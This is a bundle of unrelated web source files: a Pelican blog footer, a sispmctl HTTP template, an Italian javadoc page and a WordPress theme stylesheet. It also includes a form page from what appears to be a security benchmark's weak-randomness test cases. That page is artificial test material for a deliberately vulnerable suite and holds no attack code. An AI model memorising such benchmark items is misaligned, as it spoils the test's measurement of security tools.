<a href="http://docs.getpelican.com/" target="_blank">Pelican</a>, <a href="http://getbootstrap.com" target="_blank">Bootstrap</a> </div> <div class="col-xs-2"><p class="pull-right"><i class="fa fa-arrow-up"></i> <a href="#">Back to top</a></p></div> </div> </div> </footer> <script src="http://honkeechan.github.io/theme/js/jquery.min.js"></script> <!-- Include all compiled plugins (below), or include individual files as needed --> <script src="http://honkeechan.github.io/theme/js/bootstrap.min.js"></script> <!-- Enable responsive features in IE8 with Respond.js (https://github.com/scottjehl/Respond) --> <script src="http://honkeechan.github.io/theme/js/respond.min.js"></script> <!-- Disqus --> <script type="text/javascript"> /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */ var disqus_shortname = 'honkeechan'; // required: replace example with your forum shortname /* * * DON'T EDIT BELOW THIS LINE * * */ (function () { var s = document.createElement('script'); s.async = true; s.type = 'text/javascript'; s.src = '//' + disqus_shortname + '.disqus.com/count.js'; (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s); }()); </script> <!-- End Disqus Code --> </body> </html>
src/web2/on3.html
anlumo/sispmctl
HTTP/1.0 302 Moved Temporarily Server: pmctl Date: Sat, 04 Feb 2006 16:03:35 +0100 Location: $$on(3)?index.html:index.html$$ Connection: close $$status(1)?:$$
doc/it/ncorti/p2p/MinMessage.html
cortinico/p2p-gossipico
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="it"> <head> <!-- Generated by javadoc (version 1.7.0_51) on Tue Apr 22 15:10:18 CEST 2014 --> <title>MinMessage</title> <meta name="date" content="2014-04-22"> <link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="MinMessage"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../it/ncorti/p2p/package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/MinMessage.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p"><span class="strong">Prev Class</span></a></li> <li><a href="../../../it/ncorti/p2p/PeakInitializer.html" title="class in it.ncorti.p2p"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?it/ncorti/p2p/MinMessage.html" target="_top">Frames</a></li> <li><a href="MinMessage.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#fields_inherited_from_class_it.ncorti.p2p.Message">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">it.ncorti.p2p</div> <h2 title="Class MinMessage" class="title">Class MinMessage</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li><a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p">it.ncorti.p2p.Message</a></li> <li> <ul class="inheritance"> <li>it.ncorti.p2p.MinMessage</li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public class <span class="strong">MinMessage</span> extends <a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p">Message</a></pre> <div class="block">Classe che rappresenta un messaggio di COUNT ed utilizza la funzione di aggregazione MIN in modo da trovare il minimo dei valori</div> <dl><dt><span class="strong">Author:</span></dt> <dd>nicola</dd></dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field_summary"> <!-- --> </a> <h3>Field Summary</h3> <ul class="blockList"> <li class="blockList"><a name="fields_inherited_from_class_it.ncorti.p2p.Message"> <!-- --> </a> <h3>Fields inherited from class&nbsp;it.ncorti.p2p.<a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p">Message</a></h3> <code><a href="../../../it/ncorti/p2p/Message.html#freshness">freshness</a>, <a href="../../../it/ncorti/p2p/Message.html#type">type</a>, <a href="../../../it/ncorti/p2p/Message.html#value">value</a></code></li> </ul> </li> </ul> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../it/ncorti/p2p/MinMessage.html#MinMessage(int)">MinMessage</a></strong>(int&nbsp;val)</code> <div class="block">Costruttore per creare un nuovo messaggio di minimo, partendo da un valore</div> </td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../../../it/ncorti/p2p/MinMessage.html#merge(it.ncorti.p2p.Message)">merge</a></strong>(<a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p">Message</a>&nbsp;m)</code> <div class="block">Metodo per fondere due messaggi IC in uno nuovo che contenga l'informazione risultante</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_it.ncorti.p2p.Message"> <!-- --> </a> <h3>Methods inherited from class&nbsp;it.ncorti.p2p.<a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p">Message</a></h3> <code><a href="../../../it/ncorti/p2p/Message.html#generateISMessage(int, int)">generateISMessage</a>, <a href="../../../it/ncorti/p2p/Message.html#getFreshness()">getFreshness</a>, <a href="../../../it/ncorti/p2p/Message.html#getValue()">getValue</a>, <a href="../../../it/ncorti/p2p/Message.html#IC()">IC</a>, <a href="../../../it/ncorti/p2p/Message.html#IS()">IS</a>, <a href="../../../it/ncorti/p2p/Message.html#isFresherThen(int)">isFresherThen</a>, <a href="../../../it/ncorti/p2p/Message.html#isFresherThen(it.ncorti.p2p.Message)">isFresherThen</a>, <a href="../../../it/ncorti/p2p/Message.html#resetMessage(int)">resetMessage</a>, <a href="../../../it/ncorti/p2p/Message.html#toString()">toString</a>, <a href="../../../it/ncorti/p2p/Message.html#update(int)">update</a>, <a href="../../../it/ncorti/p2p/Message.html#update(int, int, int)">update</a>, <a href="../../../it/ncorti/p2p/Message.html#update(it.ncorti.p2p.Message)">update</a></code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="MinMessage(int)"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>MinMessage</h4> <pre>public&nbsp;MinMessage(int&nbsp;val)</pre> <div class="block">Costruttore per creare un nuovo messaggio di minimo, partendo da un valore</div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>val</code> - Valore iniziale</dd></dl> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="merge(it.ncorti.p2p.Message)"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>merge</h4> <pre>public&nbsp;void&nbsp;merge(<a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p">Message</a>&nbsp;m)</pre> <div class="block"><strong>Description copied from class:&nbsp;<code><a href="../../../it/ncorti/p2p/Message.html#merge(it.ncorti.p2p.Message)">Message</a></code></strong></div> <div class="block">Metodo per fondere due messaggi IC in uno nuovo che contenga l'informazione risultante</div> <dl> <dt><strong>Overrides:</strong></dt> <dd><code><a href="../../../it/ncorti/p2p/Message.html#merge(it.ncorti.p2p.Message)">merge</a></code>&nbsp;in class&nbsp;<code><a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p">Message</a></code></dd> <dt><span class="strong">Parameters:</span></dt><dd><code>m</code> - Messaggio da unire</dd></dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../it/ncorti/p2p/package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/MinMessage.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../it/ncorti/p2p/Message.html" title="class in it.ncorti.p2p"><span class="strong">Prev Class</span></a></li> <li><a href="../../../it/ncorti/p2p/PeakInitializer.html" title="class in it.ncorti.p2p"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?it/ncorti/p2p/MinMessage.html" target="_top">Frames</a></li> <li><a href="MinMessage.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#fields_inherited_from_class_it.ncorti.p2p.Message">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
src/main/webapp/weakrand-05/BenchmarkTest02351.html
h3xstream/Benchmark
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script src="/benchmark/js/jquery.min.js"></script> <script type="text/javascript" src="/benchmark/js/js.cookie.js"></script> <title>BenchmarkTest02351</title> </head> <body> <form action="/benchmark/weakrand-05/BenchmarkTest02351" method="POST" id="FormBenchmarkTest02351"> <div><label>Please explain your answer:</label></div> <br/> <div><textarea rows="4" cols="50" id="BenchmarkTest02351Area" name="BenchmarkTest02351Area"></textarea></div> <div><label>Any additional note for the reviewer:</label></div> <div><input type="text" id="answer" name="answer"></input></div> <br/> <div><label>An AJAX request will be sent with a parameter value 'BenchmarkTest02351' and name:</label> <input type="text" id="BenchmarkTest02351" name="BenchmarkTest02351" value="whatever" class="safe"></input></div> <div><input type="button" id="login-btn" value="Login" onclick="submitForm()"/></div> </form> <div id="ajax-form-msg1"><pre><code class="prettyprint" id="code"></code></pre></div> <script> $('.safe').keypress(function (e) { if (e.which == 13) { submitForm(); return false; } }); function submitForm() { var text = $("#FormBenchmarkTest02351 input[id=BenchmarkTest02351]").val(); $("input.headerClass").remove(); $("<input type='hidden' value='BenchmarkTest02351' />") .attr("id", text) .attr("name", text) .addClass("headerClass") .appendTo("#FormBenchmarkTest02351"); var formData = $("#FormBenchmarkTest02351").serialize(); var URL = $("#FormBenchmarkTest02351").attr("action"); var xhr = new XMLHttpRequest(); xhr.open("POST", URL, true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == XMLHttpRequest.DONE && xhr.status == 200) { $("#code").text((xhr.responseText).decodeEscapeSequence()); } else { $("#code").text("Error " + xhr.status + " " + xhr.statusText + " occurred."); } } xhr.send(formData); } function escapeRegExp(str) { return str.replace(/([.*+?^=!:${}()|\[\]\/\\])/g, "\\$1"); } function replaceAll(str, find, replace) { return str.replace(new RegExp(escapeRegExp(find), 'g'), replace); } String.prototype.decodeEscapeSequence = function() { var txt = replaceAll(this,";",""); txt = replaceAll(txt,"&#","\\"); return txt.replace(/\\x([0-9A-Fa-f]{2})/g, function() { return String.fromCharCode(parseInt(arguments[1], 16)); }); }; </script> </body> </html>
wp-content/themes/Impreza/css/motioncss.css
osuvankulov/wordpress_football
/* ---------------------------------------------------------------- MotionCSS Framework basic styles Copyright 2014 UpSolution http://us-themes.com/ NOTE: DO NOT EDIT THIS FILE! THIS FILE IS REPLACED DURING AUTO-UPDATES AND ANY CHANGES MADE HERE WILL BE OVERWRITTEN. ---------------------------------------------------------------- */ /* * Global resets */ html, body, div, span, object, iframe, img, h1, h2, h3, h4, h5, h6, p, blockquote, pre, abbr, address, cite, code, del, dfn, em, ins, kbd, q, samp, small, strong, sub, sup, var, b, i, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, button, details, figcaption, figure, footer, header, hgroup, menu, nav, section, menu, time, mark, audio, video { margin: 0; padding: 0; border: 0; outline: 0; vertical-align: baseline; background: transparent; } html, body { width: 100%; height: 100%; } * { -moz-box-sizing: border-box; box-sizing: border-box; } /** * Correct `block` display not defined in IE 8/9. */ article, aside, details, figcaption, figure, footer, header, hgroup, main, nav, section, summary { display: block; } /** * Correct `inline-block` display not defined in IE 8/9. */ audio, canvas, video { display: inline-block; *display: inline; *zoom: 1; } /** * Prevent modern browsers from displaying `audio` without controls. * Remove excess height in iOS 5 devices. */ audio:not([controls]) { display: none; height: 0; } /** * Address styling not present in IE 8/9. */ [hidden] { display: none; } /* ========================================================================== Base ========================================================================== */ /** * 1. Set default font family to sans-serif. * 2. Corrects text resizing oddly in IE6/7 when body `font-size` is set using `em` units. * 3. Prevent iOS text size adjust after orientation change, without disabling user zoom. */ html { font-family: sans-serif; /* 1 */ font-size: 100%; /* 2 */ -webkit-text-size-adjust: 100%; /* 3 */ -ms-text-size-adjust: 100%; /* 3 */ } /* ========================================================================== Links ========================================================================== */ /* * Addresses `outline` inconsistency between Chrome and other browsers. */ a:focus { outline: 0; } /* * Improves readability when focused and also mouse hovered in all browsers. * people.opera.com/patrickl/experiments/keyboard/test */ a:active, input:focus, textarea:focus, select:focus { outline: 0; } /* ========================================================================== Typography ========================================================================== */ /** * Address font-weight styling to normal. */ h1, h2, h3, h4, h5, h6 { font-weight: normal; } /** * Address styling not present in IE 8/9, Safari 5, and Chrome. */ abbr[title] { border-bottom: 1px dotted; } /** * Address style set to `bolder` in Firefox 4+, Safari 5, and Chrome. */ b, strong { font-weight: bold; } /** * Address styling in all browsers. */ ins { text-decoration: underline; } del { text-decoration: line-through; } i, em { font-style: italic; } /** * Address styling not present in Safari 5 and Chrome. */ dfn { font-style: italic; } /** * Address differences between Firefox and other browsers. */ hr { -moz-box-sizing: content-box; box-sizing: content-box; height: 0; } /** * Address styling not present in IE 8/9. */ mark { background: #ff0; color: #000; } /** * Correct font family set oddly in Safari 5 and Chrome. */ code, kbd, pre, samp { font-family: monospace, serif; font-size: 1em; } /** * Improve readability of pre-formatted text in all browsers. */ pre { white-space: pre-wrap; } /** * Set consistent quote types. */ q { quotes: "\201C" "\201D" "\2018" "\2019"; } /** * Address inconsistent and variable font size in all browsers. */ small { font-size: 80%; } /** * Prevent `sub` and `sup` affecting `line-height` in all browsers. */ sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; } sup { top: -0.5em; } sub { bottom: -0.25em; } /* ========================================================================== Embedded content ========================================================================== */ /* * 1. Removes border when inside `a` element in IE6/7/8/9, FF3. * 2. Improves image quality when scaled in IE7. * code.flickr.com/blog/2008/11/12/on-ui-quality-the-little-things-client-side-image-resizing/ */ img { border: 0; /* 1 */ -ms-interpolation-mode: bicubic; /* 2 */ max-width: 100%; height: auto; } /** * Correct overflow displayed oddly in IE 9. */ svg:not(:root) { overflow: hidden; } /* ========================================================================== Figures ========================================================================== */ /** * Address margin not present in IE 8/9 and Safari 5. */ figure { margin: 0; } /* ========================================================================== Forms ========================================================================== */ /** * Define consistent border, margin, and padding. */ fieldset { border: 1px solid #c0c0c0; margin: 0 2px; padding: 0.35em 0.625em 0.75em; } /** * 1. Correct `color` not being inherited in IE 8/9. * 2. Remove padding so people aren't caught out if they zero out fieldsets. */ legend { border: 0; /* 1 */ padding: 0; /* 2 */ } /** * 1. Correct font family not being inherited in all browsers. * 2. Correct font size not being inherited in all browsers. * 3. Address margins set differently in Firefox 4+, Safari 5, and Chrome. */ button, input, select, textarea { font-family: inherit; /* 1 */ font-size: 100%; /* 2 */ margin: 0; /* 3 */ } /** * Address Firefox 4+ setting `line-height` on `input` using `!important` in * the UA stylesheet. */ button, input { line-height: normal; } /** * Address inconsistent `text-transform` inheritance for `button` and `select`. * All other form control elements do not inherit `text-transform` values. * Correct `button` style inheritance in Chrome, Safari 5+, and IE 8+. * Correct `select` style inheritance in Firefox 4+ and Opera. */ button, select { text-transform: none; } /** * 1. Avoid the WebKit bug in Android 4.0.* where (2) destroys native `audio` * and `video` controls. * 2. Correct inability to style clickable `input` types in iOS. * 3. Improve usability and consistency of cursor style between image-type * `input` and others. */ button, html input[type="button"], /* 1 */ input[type="reset"], input[type="submit"] { -webkit-appearance: button; /* 2 */ cursor: pointer; /* 3 */ } /** * Re-set default cursor for disabled elements. */ button[disabled], html input[disabled] { cursor: default; } /** * 1. Address box sizing set to `content-box` in IE 8/9. * 2. Remove excess padding in IE 8/9. */ input[type="checkbox"], input[type="radio"] { box-sizing: border-box; /* 1 */ padding: 0; /* 2 */ } /** * 1. Address `appearance` set to `searchfield` in Safari 5 and Chrome. * 2. Address `box-sizing` set to `border-box` in Safari 5 and Chrome * (include `-moz` to future-proof). */ input[type="search"] { -webkit-appearance: textfield; /* 1 */ -moz-box-sizing: content-box; -webkit-box-sizing: content-box; /* 2 */ box-sizing: content-box; } /** * Remove inner padding and search cancel button in Safari 5 and Chrome * on OS X. */ input[type="search"]::-webkit-search-cancel-button, input[type="search"]::-webkit-search-decoration { -webkit-appearance: none; } /** * Remove inner padding and border in Firefox 4+. */ button::-moz-focus-inner, input::-moz-focus-inner { border: 0; padding: 0; } /** * 1. Remove default vertical scrollbar in IE 8/9. * 2. Improve readability and alignment in all browsers. */ textarea { overflow: auto; /* 1 */ vertical-align: top; /* 2 */ } /* ========================================================================== Tables & Lists ========================================================================== */ /** * Remove most spacing between table cells. */ table { border-collapse: collapse; border-spacing: 0; } caption, td, th, li { vertical-align: top; } dl, ul, ol { list-style: none; margin: 0; } /* ========================================================================== Common styles ========================================================================== */ .i-cf:before, .i-cf:after { content: ' '; display: table; } .i-cf:after { clear: both; } .g-html .thin { font-weight: 300; } .g-html .bold { font-weight: 700; } .g-html .align_left { text-align: left; } .g-html .align_right { text-align: right; } .g-html .align_center { text-align: center; } .g-html .align_justify { text-align: justify; } /* ************************************* GRID **********************************/ .l-header { position: relative; } .l-subheader { position: relative; margin: 0 auto; } .l-subheader-h { margin: 0 auto; max-width: 1200px; } .l-main { position: relative; } .l-submain { position: relative; margin: 0 auto; } .l-submain-h { position: relative; margin: 0 auto; max-width: 1200px; } .l-content { width: 70%; } .l-sidebar { width: 25%; } .l-footer { position: relative; } .l-subfooter { position: relative; margin: 0 auto; } .l-subfooter-h { margin: 0 auto; max-width: 1200px; } /* Canvas MODs */ .l-canvas.type_boxed, .l-canvas.type_boxed .l-subheader, .l-canvas.type_boxed ~ .l-footer .l-subfooter { max-width: 1300px; margin: 0 auto; } /* Sidebar variations */ .col_cont .l-content { width: 100%; } .col_cont .l-sidebar { display: none; } .col_contside .l-content, .col_sidecont .l-sidebar { float: left; } .col_contside .l-sidebar, .col_sidecont .l-content { float: right; } /* ******************************** HTML elements ******************************/ a { text-decoration: none; } /* Headings */ h1, h2, h3, h4, h5, h6 { margin-bottom: 20px; } .g-html > h1:last-child, .g-html > h2:last-child, .g-html > h3:last-child, .g-html > h4:last-child, .g-html > h5:last-child, .g-html > h6:last-child { margin-bottom: 0; } .g-html h2, .g-html h3, .g-html h4, .g-html h5, .g-html h6 { padding-top: 10px; } .g-html h2:first-child, .g-html h3:first-child, .g-html h4:first-child, .g-html h5:first-child, .g-html h6:first-child, .g-html h1 + h2, .g-html h1 + h3, .g-html h1 + h4, .g-html h1 + h5, .g-html h1 + h6, .g-html h2 + h3, .g-html h2 + h4, .g-html h2 + h5, .g-html h2 + h6, .g-html h3 + h4, .g-html h3 + h5, .g-html h3 + h6, .g-html h4 + h6, .g-html h4 + h5, .g-html h5 + h6, .g-html .g-hr + h2, .g-html .g-hr + h3, .g-html .g-hr + h4, .g-html .g-hr + h5, .g-html .g-hr + h6 { padding-top: 0; } /* Paragraph */ .g-html p { margin-bottom: 20px; } /* Lists */ .g-html ul, .g-html ol { margin-left: 35px; margin-bottom: 20px; } .g-html ul { list-style-type: disc; } .g-html ol { list-style-type: decimal; } .g-html li ul, .g-html li ol { margin-bottom: 5px; margin-top: 5px; } /* Address */ .g-html address { margin-bottom: 20px; } /* Preformat */ .g-html pre { display: block; font-family: Consolas, Lucida Console, monospace; overflow-x: auto; width: 100%; margin-bottom: 20px; } .g-html code { display: inline-block; vertical-align: top; font-family: Consolas, Lucida Console, monospace; } .g-html pre code { display: block; padding: 0; overflow-wrap: normal; } /* Blockquote */ .g-html blockquote { margin-bottom: 20px; } .g-html blockquote q, .g-html blockquote p { font: inherit; margin: 0; } .g-html blockquote cite { display: block; font-size: 80%; } /* Input elements */ input[type="text"], input[type="password"], input[type="email"], input[type="url"], input[type="tel"], input[type="number"], input[type="date"], textarea, select { border: none; line-height: 1.5em; width: 100%; padding: 8px; /* temp */ } input[type="text"], input[type="password"], input[type="email"], input[type="url"], input[type="tel"], input[type="number"], input[type="date"], select { height: 40px; /* temp */ vertical-align: top; } select[multiple="multiple"] { height: auto; } textarea { height: 120px; /* temp */ resize: vertical; } label, input[type="checkbox"], input[type="radio"] { cursor: pointer; } /* Buttons */ .g-btn, button, input[type="submit"] { display: inline-block; vertical-align: middle; text-align: center; white-space: nowrap; position: relative; cursor: pointer; padding: 5px 20px; /* temp */ } /* ******************************** COLUMNS ******************************/ .g-cols:before, .g-cols:after { display: table; line-height: 0; content: ''; } .g-cols:after { clear: both; } .g-cols > div { float: left; width: 100%; } /* Default offset */ .g-cols.offset_default > div { margin-left: 4.0000%; } .g-cols.offset_default > div:first-child, .g-cols.offset_default > div.full-width { margin-left: 0; } .g-cols.offset_default > .one-half, .g-cols.offset_default > .two-quarters, .g-cols.offset_default > .two-fourths, .g-cols.offset_default > .three-sixths { width: 48.0000%; } .g-cols.offset_default > .one-third, .g-cols.offset_default > .two-sixths { width: 30.6666%; } .g-cols.offset_default > .two-thirds, .g-cols.offset_default > .four-sixths { width: 65.3333%; } .g-cols.offset_default > .one-quarter, .g-cols.offset_default > .one-fourth { width: 22.0000%; } .g-cols.offset_default > .three-quarters, .g-cols.offset_default > .three-fourths { width: 74.0000%; } .g-cols.offset_default > .one-fifth { width: 16.8000%; } .g-cols.offset_default > .two-fifths { width: 37.6000%; } .g-cols.offset_default > .three-fifths { width: 58.4000%; } .g-cols.offset_default > .four-fifths { width: 79.2000%; } .g-cols.offset_default > .one-sixth { width: 13.3333%; } .g-cols.offset_default > .five-sixths { width: 82.6666%; } /* Wide offset */ .g-cols.offset_wide > div { margin-left: 6%; } .g-cols.offset_wide > div:first-child, .g-cols.offset_wide > div.full-width { margin-left: 0; } .g-cols.offset_wide > .one-half, .g-cols.offset_wide > .two-quarters, .g-cols.offset_wide > .two-fourths, .g-cols.offset_wide > .three-sixths { width: 47%; } .g-cols.offset_wide > .one-third, .g-cols.offset_wide > .two-sixths { width: 29.3333%; } .g-cols.offset_wide > .two-thirds, .g-cols.offset_wide > .four-sixths { width: 64.6666%; } .g-cols.offset_wide > .one-quarter, .g-cols.offset_wide > .one-fourth { width: 20.5000%; } .g-cols.offset_wide > .three-quarters, .g-cols.offset_wide > .three-fourths { width: 73.5000%; } .g-cols.offset_wide > .one-fifth { width: 15.2000%; } .g-cols.offset_wide > .two-fifths { width: 36.4000%; } .g-cols.offset_wide > .three-fifths { width: 57.6000%; } .g-cols.offset_wide > .four-fifths { width: 78.8000%; } .g-cols.offset_wide > .one-sixth { width: 11.6666%; } .g-cols.offset_wide > .five-sixths { width: 82.3333%; } /* Without offset */ .g-cols.offset_none > .one-half, .g-cols.offset_none > .two-quarters, .g-cols.offset_none > .two-fourths, .g-cols.offset_none > .three-sixths { width: 50%; } .g-cols.offset_none > .one-third, .g-cols.offset_none > .two-sixths { width: 33.3333%; } .g-cols.offset_none > .two-thirds, .g-cols.offset_none > .four-sixths { width: 66.6666%; } .g-cols.offset_none > .one-quarter, .g-cols.offset_none > .one-fourth { width: 25%; } .g-cols.offset_none > .three-quarters, .g-cols.offset_none > .three-fourths { width: 75%; } .g-cols.offset_none > .one-fifth { width: 20%; } .g-cols.offset_none > .two-fifths { width: 40%; } .g-cols.offset_none > .three-fifths { width: 60%; } .g-cols.offset_none > .four-fifths { width: 80%; } .g-cols.offset_none > .one-sixth { width: 16.6666%; } .g-cols.offset_none > .five-sixths { width: 83.3333%; } /* **************************** ALERTS *****************************/ .g-alert { position: relative; text-align: left; margin-bottom: 20px; /* temp */ } .g-alert-close { display: none; position: absolute; top: 0; right: 0; text-align: center; padding: 14px; /* temp */ cursor: pointer; } .g-alert-body { padding: 14px 20px; /* temp */ } /* WITH_CLOSE */ .g-alert.with_close .g-alert-close { display: block; } .g-alert.with_close .g-alert-body { padding-right: 50px; } /* TYPE */ .g-alert.type_error { background-color: #ffd9d9; color: #a24141; } .g-alert.type_success { background-color: #c9f7b2; color: #587549; } .g-alert.type_info { background-color: #cef; color: #3a648e; } .g-alert.type_attention { background-color: #fff2b2; color: #846534; } /* ---------------------------------------------------------------- MotionCSS Framework widgets styles ---------------------------------------------------------------- */ /* ************************** Widget w-actionbox basic styles ************************/ .w-actionbox { display: table; text-align: left; position: relative; width: 100%; } .w-actionbox-text { display: table-cell; vertical-align: middle; } .w-actionbox-text h1, .w-actionbox-text h2, .w-actionbox-text h3, .w-actionbox-text h4, .w-actionbox-text h5, .w-actionbox-text h6 { margin: 0; } .w-actionbox-text p { margin: 15px 0 0; /* Temp */ } .w-actionbox-controls { display: table-cell; vertical-align: middle; text-align: right; padding-left: 30px; margin: 0; } .w-actionbox-button { margin: 5px 0 5px 10px; } .w-actionbox-button:first-child { margin-left: 0; } /* ************************** Widget w-blog basic styles ************************/ .w-blog-list { position: relative; } .w-blog-list:after { display: table; content: ''; clear: both; } .w-blog-preview { display: none; line-height: 0; padding-bottom: 20px; /* Temp */ } .w-blog-entry { position: relative; } .w-blog-entry:after { display: table; content: ''; clear: both; } .w-blog-entry-preview { display: none; line-height: 0; width: 100%; position: relative; } .w-blog-meta-date, .w-blog-meta-author, .w-blog-meta-category, .w-blog-meta-tags, .w-blog-meta-comments { display: inline-block; vertical-align: top; margin-right: 10px; /* Temp */ margin-bottom: 10px; /* Temp */ } .w-blog-entry-short p:last-child { margin-bottom: 0; } .w-blog-entry-more.g-btn { margin: 20px 0 0; /* Temp */ } /* * .COLUMNS_* (show blog posts in columns) */ .w-blog.columns_2 .w-blog-entry, .w-blog.columns_3 .w-blog-entry, .w-blog.columns_4 .w-blog-entry, .w-blog.columns_5 .w-blog-entry { float: left; } .w-blog.columns_2 